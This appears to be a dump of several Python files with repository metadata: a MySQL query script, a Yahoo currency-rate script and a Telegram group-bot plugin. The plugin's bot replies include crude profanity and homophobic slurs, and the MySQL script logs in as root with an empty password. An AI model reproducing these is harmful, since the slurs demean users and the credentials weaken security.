] | null | null | null | samle_python.py | sarum90/langmapper | 010b7f8b075c45f3c43dcd7d478f6bfe192ccc01 | [
"MIT"
] | null | null | null | samle_python.py | sarum90/langmapper | 010b7f8b075c45f3c43dcd7d478f6bfe192ccc01 | [
"MIT"
] | null | null | null | def process(record):
ids = (record.get('idsurface', '') or '').split(' ')
if len(ids) > 4:
return {'language': record['language'],
'longitude': float(record['longitude'] or 0),
'latitude': float(record['latitude'] or 0),
'idsurface': ids}
| 34.875 | 56 | 0.555556 | 31 | 279 | 5 | 0.548387 | 0.141935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0.236559 | 279 | 7 | 57 | 39.857143 | 0.713615 | 0 | 0 | 0 | 0 | 0 | 0.247312 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
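A quick usage sketch of `process` with a hypothetical record; note that records whose `idsurface` splits into four or fewer ids fall through and return `None` implicitly:

```python
def process(record):
    ids = (record.get('idsurface', '') or '').split(' ')
    if len(ids) > 4:
        return {'language': record['language'],
                'longitude': float(record['longitude'] or 0),
                'latitude': float(record['latitude'] or 0),
                'idsurface': ids}

# Hypothetical record: five ids, a string longitude, and a missing latitude.
record = {'language': 'xx', 'longitude': '1.5', 'latitude': None,
          'idsurface': 'a b c d e'}
print(process(record))
# {'language': 'xx', 'longitude': 1.5, 'latitude': 0.0,
#  'idsurface': ['a', 'b', 'c', 'd', 'e']}
```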
dc1c868b655eedce37f969499e3f8d088756e9cb | 297 | py | Python | aulas/sqldb.py | thiagonantunes/Estudos | 4f3238cf036cf8ae5dc4dbdb106a2a85ed134f55 | [
"MIT"
] | 1 | 2020-04-07T09:48:15.000Z | 2020-04-07T09:48:15.000Z | aulas/sqldb.py | thiagonantunes/Estudos | 4f3238cf036cf8ae5dc4dbdb106a2a85ed134f55 | [
"MIT"
] | null | null | null | aulas/sqldb.py | thiagonantunes/Estudos | 4f3238cf036cf8ae5dc4dbdb106a2a85ed134f55 | [
"MIT"
] | null | null | null | import mysql.connector
mydb = mysql.connector.connect(
host ='127.0.0.1',
port = 3306,
user ='root',
password = '',
database="cadastro"
)
cursor = mydb.cursor()
cursor.execute("SELECT * FROM gafanhotos LIMIT 3")
resultado = cursor.fetchall()
for x in resultado:
print(x) | 18.5625 | 50 | 0.653199 | 38 | 297 | 5.105263 | 0.763158 | 0.14433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046414 | 0.20202 | 297 | 16 | 51 | 18.5625 | 0.772152 | 0 | 0 | 0 | 0 | 0 | 0.177852 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.076923 | 0 | 0.076923 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
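The snippet above needs a running MySQL server; the same DB-API cursor calls (`execute`, `fetchall`, `LIMIT`) can be exercised against an in-memory SQLite database. The schema and rows below are made up so the sketch is self-contained:

```python
import sqlite3

# Stand-in for the MySQL "cadastro" database: identical cursor API,
# but backed by in-memory SQLite so the example actually runs.
mydb = sqlite3.connect(":memory:")
cursor = mydb.cursor()
cursor.execute("CREATE TABLE gafanhotos (id INTEGER PRIMARY KEY, nome TEXT)")
cursor.executemany("INSERT INTO gafanhotos (nome) VALUES (?)",
                   [("Ana",), ("Bia",), ("Caio",), ("Duda",)])

cursor.execute("SELECT * FROM gafanhotos LIMIT 3")
resultado = cursor.fetchall()
for x in resultado:
    print(x)  # (1, 'Ana') then (2, 'Bia') then (3, 'Caio')
```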
dc1ed9368be673800a00c49ccac8a2d18c339a55 | 622 | py | Python | requests__examples/yahoo_api__rate_currency.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | requests__examples/yahoo_api__rate_currency.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | requests__examples/yahoo_api__rate_currency.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# TODO: use http://www.cbr.ru/scripts/Root.asp?PrtId=SXML or figure out the data from query.yahooapis.com
# some parameters are unclear
# TODO: build a console interface
# TODO: build a GUI
# TODO: build a server
import requests
rs = requests.get('https://query.yahooapis.com/v1/public/yql?q=select+*+from+yahoo.finance.xchange+where+pair+=+%22USDRUB,EURRUB%22&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys&callback=')
print(rs.json())
for rate in rs.json()['query']['results']['rate']:
print(rate['Name'], rate['Rate'])
| 32.736842 | 208 | 0.729904 | 89 | 622 | 5.05618 | 0.775281 | 0.073333 | 0.075556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019469 | 0.09164 | 622 | 18 | 209 | 34.555556 | 0.776991 | 0.398714 | 0 | 0 | 0 | 0.166667 | 0.59673 | 0 | 0 | 0 | 0 | 0.055556 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
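The YQL endpoint used above was shut down by Yahoo, so the request no longer succeeds; the same parsing logic can still be exercised against a local payload with the shape the code expects. The rate values below are invented:

```python
import json

# Hypothetical payload mirroring the old YQL xchange response shape.
payload = json.loads("""
{"query": {"results": {"rate": [
    {"Name": "USD/RUB", "Rate": "75.10"},
    {"Name": "EUR/RUB", "Rate": "89.30"}
]}}}
""")

for rate in payload['query']['results']['rate']:
    print(rate['Name'], rate['Rate'])
```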
dc274952ffbbbc7758469183c1112ecd840c0d35 | 18,853 | py | Python | plugins/misc.py | gorpo/manicomio_bot_heroku | aa8dc217468d076f26604a209b5798642217c789 | [
"MIT"
] | null | null | null | plugins/misc.py | gorpo/manicomio_bot_heroku | aa8dc217468d076f26604a209b5798642217c789 | [
"MIT"
] | null | null | null | plugins/misc.py | gorpo/manicomio_bot_heroku | aa8dc217468d076f26604a209b5798642217c789 | [
"MIT"
] | null | null | null |
import html
import re
import random
import amanobot
import aiohttp
from amanobot.exception import TelegramError
import time
from config import bot, sudoers, logs, bot_username
from utils import send_to_dogbin, send_to_hastebin
async def misc(msg):
if msg.get('text'):
        # echo command: repeats the user's text back
if msg['text'].startswith('fala') or msg['text'].startswith('/echo')or msg['text'].startswith('echo') or msg['text'] == '/echo@' + bot_username:
print('Usuario {} solicitou echo'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou echo --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'],'{} pra caralho'.format(msg['text'][5:]),
reply_to_message_id=reply_id)
return True
        # 'owna' command: repeats the text back with an emphatic suffix
elif msg['text'].startswith('owna'):
print('Usuario {} solicitou owna'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou owna --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'],'{} pra caralho esta porra filho da puta!'.format(msg['text'][5:]),
reply_to_message_id=reply_id)
return True
        # 'sla' command (slang for "dunno")
elif msg['text'].startswith('sla') :
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'],'{} ta foda este lance.'.format(msg['text'][4:]),
reply_to_message_id=reply_id)
return True
elif msg['text'].startswith('/mark') or msg['text'].startswith('!mark') or msg['text'] == '/mark@' + bot_username:
print('Usuario {} solicitou /mark'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /mark --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'], msg['text'][6:], 'markdown',
reply_to_message_id=reply_id)
return True
elif msg['text'] == '/admins' or msg['text'] == '/admin' or msg['text'] == 'admin' or msg['text'] == '/admin@' + bot_username:
print('Usuario {} solicitou /admins'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /admin --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['chat']['type'] == 'private':
await bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
else:
adms = await bot.getChatAdministrators(msg['chat']['id'])
names = 'Admins:\n\n'
for num, user in enumerate(adms):
names += '{} - <a href="tg://user?id={}">{}</a>\n'.format(num + 1, user['user']['id'],
html.escape(user['user']['first_name']))
await bot.sendMessage(msg['chat']['id'], names, 'html',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/token') or msg['text'].startswith('!token') or msg['text'] == '/token@' + bot_username:
print('Usuario {} solicitou /token'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /token --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
text = msg['text'][7:]
try:
bot_token = amanobot.Bot(text).getMe()
bot_name = bot_token['first_name']
bot_user = bot_token['username']
bot_id = bot_token['id']
await bot.sendMessage(msg['chat']['id'], f'''informacoes do bot:
Nome: {bot_name}
Username: @{bot_user}
ID: {bot_id}''',
reply_to_message_id=msg['message_id'])
except TelegramError:
await bot.sendMessage(msg['chat']['id'], 'Token invalido.',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/bug') or msg['text'].startswith('!bug') or msg['text'] == '/bug@' + bot_username:
print('Usuario {} solicitou /bug'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /bug --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
text = msg['text'][5:]
if text == '' or text == bot_username:
await bot.sendMessage(msg['chat']['id'], '''*Uso:* `/bug <descrição do bug>` - _Reporta erro/bug para a equipe de desenvolvimento deste bot, so devem ser reportados bugs sobre este bot!_
obs.: Mal uso há possibilidade de ID\_ban''', 'markdown',
reply_to_message_id=msg['message_id'])
else:
await bot.sendMessage(logs, f"""<a href="tg://user?id={msg['from']['id']}">{msg['from'][
'first_name']}</a> reportou um bug:
ID: <code>{msg['from']['id']}</code>
Mensagem: {text}""", 'HTML')
await bot.sendMessage(msg['chat']['id'], 'O bug foi reportado com sucesso para a minha equipe!',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/dogbin') or msg['text'].startswith('!dogbin') or msg['text'] == '/dogbin@' + bot_username or msg['text'] == 'dogbin':
print('Usuario {} solicitou /dogbin'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /dogbin --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
text = msg['text'][8:] or msg.get('reply_to_message', {}).get('text')
if not text:
await bot.sendMessage(msg['chat']['id'],
'''*Uso:* `/dogbin <texto>` - _envia um texto para o del.dog._''',
'markdown',
reply_to_message_id=msg['message_id'])
else:
link = await send_to_dogbin(text)
await bot.sendMessage(msg['chat']['id'], link, disable_web_page_preview=True,
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/hastebin') or msg['text'].startswith('!hastebin') or msg['text'] == '/hastebin@' + bot_username or msg['text'] == 'hastebin' or msg['text'] == 'pastebin':
print('Usuario {} solicitou /hastebin'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /hastebin --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
text = msg['text'][9:] or msg.get('reply_to_message', {}).get('text')
if not text:
await bot.sendMessage(msg['chat']['id'],
'''*Uso:* `/hastebin <texto>` - _envia um texto para o hastebin._''',
'markdown',
reply_to_message_id=msg['message_id'])
else:
link = await send_to_hastebin(text)
await bot.sendMessage(msg['chat']['id'], link, disable_web_page_preview=True,
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/html') or msg['text'].startswith('!html') or msg['text'] == '/html@' + bot_username or msg['text'] == 'html':
print('Usuario {} solicitou /html'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou /html --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['message_id']
else:
reply_id = None
await bot.sendMessage(msg['chat']['id'], msg['text'][6:], 'html',
reply_to_message_id=reply_id)
return True
elif msg['text'] == 'ban' or msg['text'] == '/ban' or msg['text'] == '/gorpo@' + bot_username:
print('Usuario {} solicitou ban'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou ban --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
try:
await bot.unbanChatMember(msg['chat']['id'], msg['from']['id'])
except TelegramError:
await bot.sendMessage(msg['chat']['id'],
'Nao deu pra te remover, voce.... deve ser um admin ou eu nao sou admin nesta bosta.',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].startswith('/request') or msg['text'].startswith('!request') or msg['text'] == '/request@' + bot_username or msg['text'] == 'request':
if re.match(r'^(https?)://', msg['text'][9:]):
text = msg['text'][9:]
else:
text = 'http://' + msg['text'][9:]
try:
async with aiohttp.ClientSession() as session:
r = await session.get(text)
except Exception as e:
return await bot.sendMessage(msg['chat']['id'], str(e),
reply_to_message_id=msg['message_id'])
headers = '<b>Status-Code:</b> <code>{}</code>\n'.format(str(r.status))
headers += '\n'.join('<b>{}:</b> <code>{}</code>'.format(x, html.escape(r.headers[x])) for x in r.headers)
rtext = await r.text()
if len(rtext) > 3000:
content = await r.read()
res = await send_to_dogbin(content)
else:
res = '<code>' + html.escape(rtext) + '</code>'
await bot.sendMessage(msg['chat']['id'], '<b>Headers:</b>\n{}\n\n<b>Conteudo:</b>\n{}'.format(headers, res),
'html', reply_to_message_id=msg['message_id'])
return True
elif msg['text'] == 'suco':
if msg['from']['id'] in sudoers:
is_sudo = 'é gostozinho'
else:
is_sudo = 'tem gosto de bosta'
await bot.sendMessage(msg['chat']['id'], is_sudo + '?',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].lower() == 'rt' and msg.get('reply_to_message'):
print('Usuario {} solicitou rt'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou rt --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['reply_to_message'].get('text'):
text = msg['reply_to_message']['text']
elif msg['reply_to_message'].get('caption'):
text = msg['reply_to_message']['caption']
else:
text = None
if text:
if text.lower() != 'rt' or msg['text'] == '/rt@' + bot_username or msg['text'] == 'rtt':
if not re.match('🔃 .* foi gado pra caralho do filho da puta do :\n\n👤 .*', text):
await bot.sendMessage(msg['chat']['id'], '''🔃 <b>{}</b> foi gado pra caralho concordando com o -->
👤 <b>{}</b>: <i>{}</i>'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],
text),
parse_mode='HTML',
reply_to_message_id=msg['message_id'])
return True
#---------------------------------------------------------------------------------------------------------------
elif msg['text'].lower() == 'gay' and msg.get('reply_to_message'):
print('Usuario {} solicitou gay'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou gay --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['reply_to_message'].get('text'):
text = msg['reply_to_message']['text']
elif msg['reply_to_message'].get('caption'):
text = msg['reply_to_message']['caption']
else:
text = None
if text:
if text.lower() != 'rt' or msg['text'] == 'rtt':
if not re.match('🔃 .* chamou de gay e pode sofrer processo do :\n\n👤 .*', text):
await bot.sendMessage(msg['chat']['id'], '''<b>{} pode tomar um processo pois foi estupido para caralho xingando {} de gay, este viado e bicha loca do caralho só porque ele disse</b> <i>{}</i>'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],
text),
parse_mode='HTML',
reply_to_message_id=msg['message_id'])
return True
#---------------------------------------------------------------------------------------------------------------
elif msg['text'].lower() == 'pau no cu' or msg['text'].lower() == 'pnc'and msg.get('reply_to_message'):
print('Usuario {} solicitou pau no cu(rt)'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou pau no cu(rt) --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['reply_to_message'].get('text'):
text = msg['reply_to_message']['text']
elif msg['reply_to_message'].get('caption'):
text = msg['reply_to_message']['caption']
else:
text = None
if text:
if text.lower() != 'rt' or msg['text'] == 'rtt':
if not re.match('🔃 .* chamou de pau no cu e pode sofrer processo do :\n\n👤 .*', text):
await bot.sendMessage(msg['chat']['id'], '''<b>{} xingou e nao deixou baixo para {}, eu nao deixava e cagava o filho da puta na porrada so porque ele disse</b> <i>{}</i>'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],
text),
parse_mode='HTML',
reply_to_message_id=msg['message_id'])
return True
elif msg['text'].lower() == 'filho da puta' or msg['text'].lower() == 'pnc'and msg.get('reply_to_message'):
print('Usuario {} solicitou filho da puta(rt)'.format(msg['from']['first_name']))
log = '\nUsuario {} solicitou filho da puta(rt) --> Grupo: {} --> Data/hora:{}'.format(msg['from']['first_name'],msg['chat']['title'],time.ctime())
arquivo = open('logs/grupos.txt','a')
arquivo.write(log)
arquivo.close()
if msg['reply_to_message'].get('text'):
text = msg['reply_to_message']['text']
elif msg['reply_to_message'].get('caption'):
text = msg['reply_to_message']['caption']
else:
text = None
if text:
if text.lower() != 'rt' or msg['text'] == 'rtt':
if not re.match('🔃 .* xingou a mãe do \n\n👤 .*', text):
await bot.sendMessage(msg['chat']['id'], '''<b>{} xingou a mãe do {}, poxa o cara só falou</b> <i>{}</i>'''.format(msg['from']['first_name'], msg['reply_to_message']['from']['first_name'],
text),
parse_mode='HTML',
reply_to_message_id=msg['message_id'])
return True
| 57.831288 | 302 | 0.481038 | 2,074 | 18,853 | 4.24783 | 0.12054 | 0.050057 | 0.092168 | 0.059932 | 0.74756 | 0.707037 | 0.68025 | 0.635528 | 0.572077 | 0.528604 | 0 | 0.001357 | 0.335596 | 18,853 | 326 | 303 | 57.831288 | 0.701182 | 0.016655 | 0 | 0.559441 | 0 | 0.017483 | 0.298202 | 0.008797 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.031469 | 0 | 0.094406 | 0.048951 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
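Every handler in `misc.py` above repeats the same four-line open/write/close logging block; a sketch of a helper that factors it out (the `log_command` name is hypothetical, and the sketch writes to a temp file so it is self-contained):

```python
import os
import tempfile
import time

def log_command(first_name, command, chat_title, path):
    """Append one audit line per handled command; a context manager
    replaces the repeated open()/write()/close() calls."""
    line = '\nUsuario {} solicitou {} --> Grupo: {} --> Data/hora:{}'.format(
        first_name, command, chat_title, time.ctime())
    with open(path, 'a') as arquivo:  # closed automatically on exit
        arquivo.write(line)
    return line

# Usage against a temporary file instead of logs/grupos.txt:
tmp = os.path.join(tempfile.mkdtemp(), "grupos.txt")
entry = log_command("Alice", "/echo", "TestGroup", path=tmp)
print(entry.startswith("\nUsuario Alice solicitou /echo"))  # True
```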